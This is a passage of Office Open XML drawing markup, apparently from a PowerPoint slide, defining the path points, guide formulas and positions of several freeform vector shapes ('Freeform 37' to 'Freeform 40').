                    <a:lnTo>
                      <a:pt x="441" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="64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2" name="Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5935663" y="1444625"/>
                <a:ext cx="68262" cy="73025"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 191"/>
                  <a:gd name="T1" fmla="*/ 204 h 205"/>
                  <a:gd name="T2" fmla="*/ 0 w 191"/>
                  <a:gd name="T3" fmla="*/ 152 h 205"/>
                  <a:gd name="T4" fmla="*/ 58 w 191"/>
                  <a:gd name="T5" fmla="*/ 0 h 205"/>
                  <a:gd name="T6" fmla="*/ 190 w 191"/>
                  <a:gd name="T7" fmla="*/ 52 h 205"/>
                  <a:gd name="T8" fmla="*/ 127 w 191"/>
                  <a:gd name="T9" fmla="*/ 204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1" h="205">
                    <a:moveTo>
                      <a:pt x="127" y="204"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="204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3" name="Freeform 38"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6094413" y="1331913"/>
                <a:ext cx="282575" cy="317500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 426 w 783"/>
                  <a:gd name="T1" fmla="*/ 614 h 883"/>
                  <a:gd name="T2" fmla="*/ 426 w 783"/>
                  <a:gd name="T3" fmla="*/ 614 h 883"/>
                  <a:gd name="T4" fmla="*/ 662 w 783"/>
                  <a:gd name="T5" fmla="*/ 162 h 883"/>
                  <a:gd name="T6" fmla="*/ 782 w 783"/>
                  <a:gd name="T7" fmla="*/ 225 h 883"/>
                  <a:gd name="T8" fmla="*/ 441 w 783"/>
                  <a:gd name="T9" fmla="*/ 882 h 883"/>
                  <a:gd name="T10" fmla="*/ 289 w 783"/>
                  <a:gd name="T11" fmla="*/ 803 h 883"/>
                  <a:gd name="T12" fmla="*/ 368 w 783"/>
                  <a:gd name="T13" fmla="*/ 257 h 883"/>
                  <a:gd name="T14" fmla="*/ 363 w 783"/>
                  <a:gd name="T15" fmla="*/ 257 h 883"/>
                  <a:gd name="T16" fmla="*/ 127 w 783"/>
                  <a:gd name="T17" fmla="*/ 719 h 883"/>
                  <a:gd name="T18" fmla="*/ 0 w 783"/>
                  <a:gd name="T19" fmla="*/ 656 h 883"/>
                  <a:gd name="T20" fmla="*/ 347 w 783"/>
                  <a:gd name="T21" fmla="*/ 0 h 883"/>
                  <a:gd name="T22" fmla="*/ 499 w 783"/>
                  <a:gd name="T23" fmla="*/ 78 h 883"/>
                  <a:gd name="T24" fmla="*/ 426 w 783"/>
                  <a:gd name="T25" fmla="*/ 614 h 8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83" h="883">
                    <a:moveTo>
                      <a:pt x="426" y="614"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="426" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="782" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="803"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="614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4" name="Freeform 39"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6296025" y="1512888"/>
                <a:ext cx="188913" cy="207962"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 168 w 526"/>
                  <a:gd name="T1" fmla="*/ 305 h 579"/>
                  <a:gd name="T2" fmla="*/ 142 w 526"/>
                  <a:gd name="T3" fmla="*/ 347 h 579"/>
                  <a:gd name="T4" fmla="*/ 131 w 526"/>
                  <a:gd name="T5" fmla="*/ 389 h 579"/>
                  <a:gd name="T6" fmla="*/ 137 w 526"/>
                  <a:gd name="T7" fmla="*/ 426 h 579"/>
                  <a:gd name="T8" fmla="*/ 142 w 526"/>
                  <a:gd name="T9" fmla="*/ 441 h 579"/>
                  <a:gd name="T10" fmla="*/ 158 w 526"/>
                  <a:gd name="T11" fmla="*/ 452 h 579"/>
                  <a:gd name="T12" fmla="*/ 189 w 526"/>
                  <a:gd name="T13" fmla="*/ 463 h 579"/>
                  <a:gd name="T14" fmla="*/ 215 w 526"/>
                  <a:gd name="T15" fmla="*/ 457 h 579"/>
                  <a:gd name="T16" fmla="*/ 247 w 526"/>
                  <a:gd name="T17" fmla="*/ 441 h 579"/>
                  <a:gd name="T18" fmla="*/ 389 w 526"/>
                  <a:gd name="T19" fmla="*/ 473 h 579"/>
                  <a:gd name="T20" fmla="*/ 357 w 526"/>
                  <a:gd name="T21" fmla="*/ 510 h 579"/>
                  <a:gd name="T22" fmla="*/ 299 w 526"/>
                  <a:gd name="T23" fmla="*/ 557 h 579"/>
                  <a:gd name="T24" fmla="*/ 262 w 526"/>
                  <a:gd name="T25" fmla="*/ 573 h 579"/>
                  <a:gd name="T26" fmla="*/ 195 w 526"/>
                  <a:gd name="T27" fmla="*/ 573 h 579"/>
                  <a:gd name="T28" fmla="*/ 110 w 526"/>
                  <a:gd name="T29" fmla="*/ 536 h 579"/>
                  <a:gd name="T30" fmla="*/ 78 w 526"/>
                  <a:gd name="T31" fmla="*/ 515 h 579"/>
                  <a:gd name="T32" fmla="*/ 31 w 526"/>
                  <a:gd name="T33" fmla="*/ 473 h 579"/>
                  <a:gd name="T34" fmla="*/ 21 w 526"/>
                  <a:gd name="T35" fmla="*/ 447 h 579"/>
                  <a:gd name="T36" fmla="*/ 5 w 526"/>
                  <a:gd name="T37" fmla="*/ 405 h 579"/>
                  <a:gd name="T38" fmla="*/ 0 w 526"/>
                  <a:gd name="T39" fmla="*/ 357 h 579"/>
                  <a:gd name="T40" fmla="*/ 11 w 526"/>
                  <a:gd name="T41" fmla="*/ 310 h 579"/>
                  <a:gd name="T42" fmla="*/ 31 w 526"/>
                  <a:gd name="T43" fmla="*/ 263 h 579"/>
                  <a:gd name="T44" fmla="*/ 84 w 526"/>
                  <a:gd name="T45" fmla="*/ 169 h 579"/>
                  <a:gd name="T46" fmla="*/ 147 w 526"/>
                  <a:gd name="T47" fmla="*/ 79 h 579"/>
                  <a:gd name="T48" fmla="*/ 184 w 526"/>
                  <a:gd name="T49" fmla="*/ 48 h 579"/>
                  <a:gd name="T50" fmla="*/ 221 w 526"/>
                  <a:gd name="T51" fmla="*/ 22 h 579"/>
                  <a:gd name="T52" fmla="*/ 268 w 526"/>
                  <a:gd name="T53" fmla="*/ 6 h 579"/>
                  <a:gd name="T54" fmla="*/ 315 w 526"/>
                  <a:gd name="T55" fmla="*/ 0 h 579"/>
                  <a:gd name="T56" fmla="*/ 336 w 526"/>
                  <a:gd name="T57" fmla="*/ 6 h 579"/>
                  <a:gd name="T58" fmla="*/ 394 w 526"/>
                  <a:gd name="T59" fmla="*/ 22 h 579"/>
                  <a:gd name="T60" fmla="*/ 425 w 526"/>
                  <a:gd name="T61" fmla="*/ 42 h 579"/>
                  <a:gd name="T62" fmla="*/ 489 w 526"/>
                  <a:gd name="T63" fmla="*/ 95 h 579"/>
                  <a:gd name="T64" fmla="*/ 499 w 526"/>
                  <a:gd name="T65" fmla="*/ 111 h 579"/>
                  <a:gd name="T66" fmla="*/ 525 w 526"/>
                  <a:gd name="T67" fmla="*/ 195 h 579"/>
                  <a:gd name="T68" fmla="*/ 519 w 526"/>
                  <a:gd name="T69" fmla="*/ 236 h 579"/>
                  <a:gd name="T70" fmla="*/ 504 w 526"/>
                  <a:gd name="T71" fmla="*/ 289 h 579"/>
                  <a:gd name="T72" fmla="*/ 446 w 526"/>
                  <a:gd name="T73" fmla="*/ 389 h 579"/>
                  <a:gd name="T74" fmla="*/ 189 w 526"/>
                  <a:gd name="T75" fmla="*/ 268 h 579"/>
                  <a:gd name="T76" fmla="*/ 389 w 526"/>
                  <a:gd name="T77" fmla="*/ 221 h 579"/>
                  <a:gd name="T78" fmla="*/ 394 w 526"/>
                  <a:gd name="T79" fmla="*/ 200 h 579"/>
                  <a:gd name="T80" fmla="*/ 399 w 526"/>
                  <a:gd name="T81" fmla="*/ 179 h 579"/>
                  <a:gd name="T82" fmla="*/ 394 w 526"/>
                  <a:gd name="T83" fmla="*/ 147 h 579"/>
                  <a:gd name="T84" fmla="*/ 383 w 526"/>
                  <a:gd name="T85" fmla="*/ 132 h 579"/>
                  <a:gd name="T86" fmla="*/ 368 w 526"/>
                  <a:gd name="T87" fmla="*/ 121 h 579"/>
                  <a:gd name="T88" fmla="*/ 331 w 526"/>
                  <a:gd name="T89" fmla="*/ 111 h 579"/>
                  <a:gd name="T90" fmla="*/ 315 w 526"/>
                  <a:gd name="T91" fmla="*/ 116 h 579"/>
                  <a:gd name="T92" fmla="*/ 299 w 526"/>
                  <a:gd name="T93" fmla="*/ 121 h 579"/>
                  <a:gd name="T94" fmla="*/ 273 w 526"/>
                  <a:gd name="T95" fmla="*/ 147 h 579"/>
                  <a:gd name="T96" fmla="*/ 236 w 526"/>
                  <a:gd name="T97" fmla="*/ 195 h 579"/>
                  <a:gd name="T98" fmla="*/ 357 w 526"/>
                  <a:gd name="T99" fmla="*/ 273 h 5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26" h="579">
                    <a:moveTo>
                      <a:pt x="168" y="305"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="168" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="305"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="389" y="221"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="389" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="221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5" name="Freeform 40"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6442075" y="1550988"/>
                <a:ext cx="177800" cy="258762"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 494 w 495"/>
                  <a:gd name="T1" fmla="*/ 83 h 719"/>
                  <a:gd name="T2" fmla="*/ 405 w 495"/>
                  <a:gd name="T3" fmla="*/ 215 h 719"/>
                  <a:gd name="T4" fmla="*/ 473 w 495"/>
                  <a:gd name="T5" fmla="*/ 262 h 719"/>
                  <a:gd name="T6" fmla="*/ 415 w 495"/>
                  <a:gd name="T7" fmla="*/ 341 h 719"/>
                  <a:gd name="T8" fmla="*/ 347 w 495"/>
                  <a:gd name="T9" fmla="*/ 294 h 719"/>
                  <a:gd name="T10" fmla="*/ 174 w 495"/>
                  <a:gd name="T11" fmla="*/ 541 h 719"/>
                  <a:gd name="T12" fmla="*/ 174 w 495"/>
                  <a:gd name="T13" fmla="*/ 541 h 719"/>
                  <a:gd name="T14" fmla="*/ 158 w 495"/>
                  <a:gd name="T15" fmla="*/ 567 h 719"/>
                  <a:gd name="T16" fmla="*/ 153 w 495"/>
                  <a:gd name="T17" fmla="*/ 582 h 719"/>
                  <a:gd name="T18" fmla="*/ 153 w 495"/>
                  <a:gd name="T19" fmla="*/ 582 h 719"/>
                  <a:gd name="T20" fmla="*/ 158 w 495"/>
                  <a:gd name="T21" fmla="*/ 603 h 719"/>
                  <a:gd name="T22" fmla="*/ 179 w 495"/>
                  <a:gd name="T23" fmla="*/ 619 h 719"/>
                  <a:gd name="T24" fmla="*/ 179 w 495"/>
                  <a:gd name="T25" fmla="*/ 619 h 719"/>
                  <a:gd name="T26" fmla="*/ 195 w 495"/>
                  <a:gd name="T27" fmla="*/ 630 h 719"/>
                  <a:gd name="T28" fmla="*/ 195 w 495"/>
                  <a:gd name="T29" fmla="*/ 630 h 719"/>
                  <a:gd name="T30" fmla="*/ 205 w 495"/>
                  <a:gd name="T31" fmla="*/ 635 h 719"/>
                  <a:gd name="T32" fmla="*/ 147 w 495"/>
                  <a:gd name="T33" fmla="*/ 718 h 719"/>
                  <a:gd name="T34" fmla="*/ 147 w 495"/>
                  <a:gd name="T35" fmla="*/ 718 h 719"/>
                  <a:gd name="T36" fmla="*/ 110 w 495"/>
                  <a:gd name="T37" fmla="*/ 692 h 719"/>
                  <a:gd name="T38" fmla="*/ 110 w 495"/>
                  <a:gd name="T39" fmla="*/ 692 h 719"/>
                  <a:gd name="T40" fmla="*/ 74 w 495"/>
                  <a:gd name="T41" fmla="*/ 666 h 719"/>
                  <a:gd name="T42" fmla="*/ 74 w 495"/>
                  <a:gd name="T43" fmla="*/ 666 h 719"/>
                  <a:gd name="T44" fmla="*/ 43 w 495"/>
                  <a:gd name="T45" fmla="*/ 645 h 719"/>
                  <a:gd name="T46" fmla="*/ 22 w 495"/>
                  <a:gd name="T47" fmla="*/ 624 h 719"/>
                  <a:gd name="T48" fmla="*/ 22 w 495"/>
                  <a:gd name="T49" fmla="*/ 624 h 719"/>
                  <a:gd name="T50" fmla="*/ 6 w 495"/>
                  <a:gd name="T51" fmla="*/ 603 h 719"/>
                  <a:gd name="T52" fmla="*/ 0 w 495"/>
                  <a:gd name="T53" fmla="*/ 582 h 719"/>
                  <a:gd name="T54" fmla="*/ 0 w 495"/>
                  <a:gd name="T55" fmla="*/ 582 h 719"/>
                  <a:gd name="T56" fmla="*/ 0 w 495"/>
                  <a:gd name="T57" fmla="*/ 556 h 719"/>
                  <a:gd name="T58" fmla="*/ 11 w 495"/>
                  <a:gd name="T59" fmla="*/ 535 h 719"/>
                  <a:gd name="T60" fmla="*/ 11 w 495"/>
                  <a:gd name="T61" fmla="*/ 535 h 719"/>
                  <a:gd name="T62" fmla="*/ 48 w 495"/>
                  <a:gd name="T63" fmla="*/ 472 h 719"/>
                  <a:gd name="T64" fmla="*/ 231 w 495"/>
                  <a:gd name="T65" fmla="*/ 210 h 719"/>
                  <a:gd name="T66" fmla="*/ 169 w 495"/>
                  <a:gd name="T67" fmla="*/ 167 h 719"/>
                  <a:gd name="T68" fmla="*/ 227 w 495"/>
                  <a:gd name="T69" fmla="*/ 89 h 719"/>
                  <a:gd name="T70" fmla="*/ 284 w 495"/>
                  <a:gd name="T71" fmla="*/ 130 h 719"/>
                  <a:gd name="T72" fmla="*/ 378 w 495"/>
                  <a:gd name="T73" fmla="*/ 0 h 719"/>
                  <a:gd name="T74" fmla="*/ 494 w 495"/>
                  <a:gd name="T75" fmla="*/ 83 h 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95" h="719">
                    <a:moveTo>
                      <a:pt x="494" y="83"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="405" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="582"/>
